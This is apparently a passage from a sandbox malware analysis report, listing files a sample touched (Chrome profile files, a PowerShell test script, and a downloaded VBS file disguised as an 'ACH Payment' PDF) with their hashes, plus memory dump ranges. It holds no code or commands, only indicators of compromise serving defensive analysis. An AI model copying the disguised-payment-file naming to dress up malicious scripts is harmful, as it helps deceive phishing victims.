                                                                              5f7627b1f6864599bdf95efe86b12aa52272beaa937b434200c6e52efd96af22

                                                                              SHA512

                                                                              18f962fe05d7706670e9568d170bfe73c0ed31d15470b831bda58b1392aa2ebf2197fb856d3c453bca31fce7a1bc0433f3f9f1d7943aca395b2fe8a016334280

                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                              Filesize

                                                                              7KB

                                                                              MD5

                                                                              54d4fccf8cae6843100bfa3dac86b880

                                                                              SHA1

                                                                              6ce5eb3e6bfcb9e783a189cee02dea93990bd71e

                                                                              SHA256

                                                                              e8a9361d2affe7cc18cb7daad2244b69dedbc3168964dc4645be953d990fb0e1

                                                                              SHA512

                                                                              098968b0383cbb44830e35374e28bb1131f69e878c52c2f8affd6d549f793054219f6e406155cc87118124ce35910942e788084daa54c5f0be2ee3174dc75abe

                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                              Filesize

                                                                              6KB

                                                                              MD5

                                                                              390fa02de0297dc3df246d0ece4b6875

                                                                              SHA1

                                                                              478666212bddd1eb9a92e2fc823ce875946e6105

                                                                              SHA256

                                                                              9269e7a5d66ecddead08d748eae69a06006ea44af19eb28b7eae0d1fc1494345

                                                                              SHA512

                                                                              2fe86fb0f37dcac4a89b0a76ba8f0b7d52c9e69324f265d62fefd769649f1393a365fd965882eb30a60e4485f2b1887758c4c6bdbdbc7ce1de7d06d73d1eee93

                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                              Filesize

                                                                              7KB

                                                                              MD5

                                                                              4a10f81216384962bf6d76f8cae8219c

                                                                              SHA1

                                                                              c65289b53e03c398a997ff7bfeb93087e22efdba

                                                                              SHA256

                                                                              b48d8400aa6041a8c2a355c02614ef766d44da90195f7e504d7cb6512cf9ec7d

                                                                              SHA512

                                                                              e305ee7d706b107ad4321174ec6f1df5a01151ff798c88b4b8f195763147f4d35a2a4303e02b99214916574775b59fe90cc0a844fcddc84d024b6116e8d7c34b

                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                              Filesize

                                                                              6KB

                                                                              MD5

                                                                              86158e9c09a57df76931c543e7a3dd5d

                                                                              SHA1

                                                                              c67aa584402e25409dc53900ee50801f436be451

                                                                              SHA256

                                                                              feb82e4cbca051f735eb640bfeb0aafd1c1723f04ff2ad966e52eb2b7605400f

                                                                              SHA512

                                                                              68af53526b52020d19087357b40c1034a6924b163c382fe744a2b735d5cc8b4477c8da29cb780492925587b86d8a5e1601bd1f98700e6c047f49952a870618fd

                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

                                                                              Filesize

                                                                              72B

                                                                              MD5

                                                                              caf717ded3be16d7c8bd079195eaeb3a

                                                                              SHA1

                                                                              427e33f9bfb06f14037cd53e368fa34e577f3f0a

                                                                              SHA256

                                                                              905a95de0eed6fb92a4d6975674cdb534d977a8172e8ad4a334f7f3f62142c3b

                                                                              SHA512

                                                                              36edb690e6e1d08def64c44407bd335c2e507f6daaf44987df6cfbc31b2af9298739b5cddbfbb1b196543744a47793ebefe18f1ac134c4762c74ceb91395eb6d

                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe58c119.TMP

                                                                              Filesize

                                                                              48B

                                                                              MD5

                                                                              bd6b7887af1864b871fd462af57d5054

                                                                              SHA1

                                                                              ebc5f976d0b6ab7443de166c98232468ead1d2c0

                                                                              SHA256

                                                                              cb1005036348abee089f2923f971dc47fd4383f246abc57a499ca8a67fda0325

                                                                              SHA512

                                                                              40d0558a6aeee2a57d9ccc6949b6e9dd97a28f5b35815cd201937daf149fc53f3e9f01721e0c7f88b8bc4a4cb20a32c7e60699908c4b7fa765f4d1198e76783f

                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                                                              Filesize

                                                                              87KB

                                                                              MD5

                                                                              02141755a998604786790fab03c8cabf

                                                                              SHA1

                                                                              90ce107036aa034c7b4d3c025c384259edf2f00e

                                                                              SHA256

                                                                              8d0f5b8c847f43b16a77917742c46e3f6530cb6892c2256f5178f9d61f8797d5

                                                                              SHA512

                                                                              5f1e109148bd2509d948f55a114c4c298594e66039b9b89ed7c1d453e4fd7faa3cbaf780eaa43b44aabc4a0b5fbdc91346134c6f92e0c872c10300d43a8391bf

                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

                                                                              Filesize

                                                                              101KB

                                                                              MD5

                                                                              9810fcd17a1f0aa4586eccac6ed4dd93

                                                                              SHA1

                                                                              874ea341f152a88e454881226f20a09a783b10c1

                                                                              SHA256

                                                                              de46ded57c4e4fabd6bcafd001e4fb03d4d719f2e73a9babc52e768d5757ae8d

                                                                              SHA512

                                                                              4ffccd8f96e06cec83f7aa8bb3db66fbc0607f12a57f4aa7ea7ff4aefcdb7ff7d8f8271a7fe02859118c539a3367a5b388d593f8cfebe4a34da76c73cf03c304

                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

                                                                              Filesize

                                                                              107KB

                                                                              MD5

                                                                              b4faff9db3434030ac33a187eac5d200

                                                                              SHA1

                                                                              4076b1c238e120572dcb346194a7848838ab6e2f

                                                                              SHA256

                                                                              0cd73c0a324643d680baf50d482b561b876243824cd2ec27d0cf67ee5367dc13

                                                                              SHA512

                                                                              0a666cd2ed3e40dbf9be62ae7d87fe6aa709e2213bda7a3c88b281310efcbab50d089f4e91c9afc9c0a6324a652ec2a2b5f1116f3a886f551b60ae5ba6744d59

                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache~RFe5881be.TMP

                                                                              Filesize

                                                                              97KB

                                                                              MD5

                                                                              6d87b43cf67b719c5a633e2377bb88c7

                                                                              SHA1

                                                                              edd73d6db77309b5b2a9e0098309bb7f3e048f80

                                                                              SHA256

                                                                              88fef41829ec3aa17ba62e41d2e2a64c54adf4712a5cc36f88a411c7fe96381e

                                                                              SHA512

                                                                              14a6f7fba5e6e725308b777f86de51b080ce16c4603f93f69e7580f7a9471fd8119b250b423e7556f7fcb4870feb16c873d33cb6acf876f1c5d7da23e9c7ec91

                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json

                                                                              Filesize

                                                                              2B

                                                                              MD5

                                                                              99914b932bd37a50b983c5e7c90ae93b

                                                                              SHA1

                                                                              bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

                                                                              SHA256

                                                                              44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

                                                                              SHA512

                                                                              27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

                                                                            • C:\Users\Admin\AppData\Local\Temp\Error.pdf

                                                                              Filesize

                                                                              56KB

                                                                              MD5

                                                                              d7f8acc23447803e1066bf68c94df562

                                                                              SHA1

                                                                              19abc068947bfbe92b259401c31cd622cc586334

                                                                              SHA256

                                                                              ebedad982f57e95005c13bb5dd0331fe7417f977ae20ec531b7ca1bfe01e99a0

                                                                              SHA512

                                                                              ff858a3d5068018b362742179650999639867e52d88abc05890ae11da3914e2414de8d9bfe25525b1418a30bd501b7587cffd3ff08fb3bac0bd2dacb6a6d4b39

                                                                            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ul5cthvq.oix.ps1

                                                                              Filesize

                                                                              60B

                                                                              MD5

                                                                              d17fe0a3f47be24a6453e9ef58c94641

                                                                              SHA1

                                                                              6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                              SHA256

                                                                              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                              SHA512

                                                                              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                            • C:\Users\Admin\Downloads\ACH Payment_USD 3480.pdf address 2023-07-13 .vbs

                                                                              Filesize

                                                                              2.4MB

                                                                              MD5

                                                                              d86f23941cc6e4b33b758a8cd2e94dca

                                                                              SHA1

                                                                              60f1673919ed51df2004a58e490be3dac5cecb39

                                                                              SHA256

                                                                              26ee00d9c30b365f6448bcb84d4594e04a557157a78a5b6e4f8dbc4cfb31f7d3

                                                                              SHA512

                                                                              68b3807316940a6f0535ed39ce3005a15274d54c780c3bbbf6f1547c7ef67fbd6dbf5607ad260ceff5f667809a838cf361c5a996aae69dc185bea47dbf755846

                                                                            • C:\Users\Admin\Downloads\ACH Payment_USD 3480.pdf address 2023-07-13 .vbs

                                                                              Filesize

                                                                              2.4MB

                                                                              MD5

                                                                              d86f23941cc6e4b33b758a8cd2e94dca

                                                                              SHA1

                                                                              60f1673919ed51df2004a58e490be3dac5cecb39

                                                                              SHA256

                                                                              26ee00d9c30b365f6448bcb84d4594e04a557157a78a5b6e4f8dbc4cfb31f7d3

                                                                              SHA512

                                                                              68b3807316940a6f0535ed39ce3005a15274d54c780c3bbbf6f1547c7ef67fbd6dbf5607ad260ceff5f667809a838cf361c5a996aae69dc185bea47dbf755846

                                                                            • memory/1940-472-0x00007FF831110000-0x00007FF831BD1000-memory.dmp

                                                                              Filesize

                                                                              10.8MB

                                                                            • memory/1940-473-0x0000026CFB370000-0x0000026CFB380000-memory.dmp

                                                                              Filesize

                                                                              64KB

                                                                            • memory/1940-474-0x0000026CFB370000-0x0000026CFB380000-memory.dmp

                                                                              Filesize

                                                                              64KB

                                                                            • memory/1940-475-0x0000026CFB370000-0x0000026CFB380000-memory.dmp

                                                                              Filesize

                                                                              64KB

                                                                            • memory/1940-467-0x0000026CFB3B0000-0x0000026CFB3D2000-memory.dmp

                                                                              Filesize

                                                                              136KB

                                                                            • memory/1940-498-0x00007FF831110000-0x00007FF831BD1000-memory.dmp

                                                                              Filesize

                                                                              10.8MB

                                                                            • memory/1940-504-0x0000026CFB370000-0x0000026CFB380000-memory.dmp

                                                                              Filesize

                                                                              64KB

                                                                            • memory/1940-503-0x0000026CFB370000-0x0000026CFB380000-memory.dmp

                                                                              Filesize

                                                                              64KB

                                                                            • memory/1940-502-0x0000026CFB370000-0x0000026CFB380000-memory.dmp

                                                                              Filesize

                                                                              64KB

                                                                            • memory/2964-479-0x0000000004D70000-0x0000000004D80000-memory.dmp

                                                                              Filesize

                                                                              64KB

                                                                            • memory/2964-528-0x0000000008270000-0x000000000979F000-memory.dmp

                                                                              Filesize

                                                                              21.2MB

                                                                            • memory/2964-496-0x0000000007BF0000-0x000000000826A000-memory.dmp

                                                                              Filesize

                                                                              6.5MB

                                                                            • memory/2964-497-0x00000000067E0000-0x00000000067FA000-memory.dmp

                                                                              Filesize

                                                                              104KB

                                                                            • memory/2964-483-0x0000000005B50000-0x0000000005BB6000-memory.dmp

                                                                              Filesize

                                                                              408KB

                                                                            • memory/2964-499-0x0000000007570000-0x0000000007606000-memory.dmp

                                                                              Filesize

                                                                              600KB

                                                                            • memory/2964-500-0x00000000074C0000-0x00000000074E2000-memory.dmp

                                                                              Filesize

                                                                              136KB

                                                                            • memory/2964-501-0x00000000097A0000-0x0000000009D44000-memory.dmp

                                                                              Filesize

                                                                              5.6MB

                                                                            • memory/2964-482-0x0000000005330000-0x0000000005396000-memory.dmp

                                                                              Filesize

                                                                              408KB

                                                                            • memory/2964-481-0x0000000005290000-0x00000000052B2000-memory.dmp

                                                                              Filesize

                                                                              136KB

                                                                            • memory/2964-480-0x00000000053B0000-0x00000000059D8000-memory.dmp

                                                                              Filesize

                                                                              6.2MB

                                                                            • memory/2964-505-0x0000000074CB0000-0x0000000075460000-memory.dmp

                                                                              Filesize

                                                                              7.7MB

                                                                            • memory/2964-478-0x0000000004D70000-0x0000000004D80000-memory.dmp

                                                                              Filesize

                                                                              64KB

                                                                            • memory/2964-524-0x0000000004D70000-0x0000000004D80000-memory.dmp

                                                                              Filesize

                                                                              64KB

                                                                            • memory/2964-527-0x00000000068D0000-0x00000000068D1000-memory.dmp

                                                                              Filesize

                                                                              4KB

                                                                            • memory/2964-493-0x0000000006280000-0x000000000629E000-memory.dmp

                                                                              Filesize

                                                                              120KB

                                                                            • memory/2964-529-0x0000000008270000-0x000000000979F000-memory.dmp

                                                                              Filesize

                                                                              21.2MB

                                                                            • memory/2964-536-0x00000000776D1000-0x00000000777F1000-memory.dmp

                                                                              Filesize

                                                                              1.1MB

                                                                            • memory/2964-537-0x00000000776D1000-0x00000000777F1000-memory.dmp

                                                                              Filesize

                                                                              1.1MB

                                                                            • memory/2964-562-0x0000000074CB0000-0x0000000075460000-memory.dmp

                                                                              Filesize

                                                                              7.7MB

                                                                            • memory/2964-476-0x0000000074CB0000-0x0000000075460000-memory.dmp

                                                                              Filesize

                                                                              7.7MB

                                                                            • memory/2964-477-0x0000000004C90000-0x0000000004CC6000-memory.dmp

                                                                              Filesize

                                                                              216KB

                                                                            • memory/3636-541-0x00000000776D1000-0x00000000777F1000-memory.dmp

                                                                              Filesize

                                                                              1.1MB

                                                                            • memory/3636-544-0x0000000001280000-0x00000000027AF000-memory.dmp

                                                                              Filesize

                                                                              21.2MB

                                                                            • memory/3636-545-0x0000000000400000-0x000000000062B000-memory.dmp

                                                                              Filesize

                                                                              2.2MB

                                                                            • memory/3636-540-0x0000000077758000-0x0000000077759000-memory.dmp

                                                                              Filesize

                                                                              4KB

                                                                            • memory/3636-555-0x0000000000400000-0x000000000062B000-memory.dmp

                                                                              Filesize

                                                                              2.2MB

                                                                            • memory/3636-559-0x0000000001280000-0x00000000027AF000-memory.dmp

                                                                              Filesize

                                                                              21.2MB

                                                                            • memory/3636-539-0x0000000001280000-0x00000000027AF000-memory.dmp

                                                                              Filesize

                                                                              21.2MB

                                                                            • memory/3636-538-0x0000000001280000-0x00000000027AF000-memory.dmp

                                                                              Filesize

                                                                              21.2MB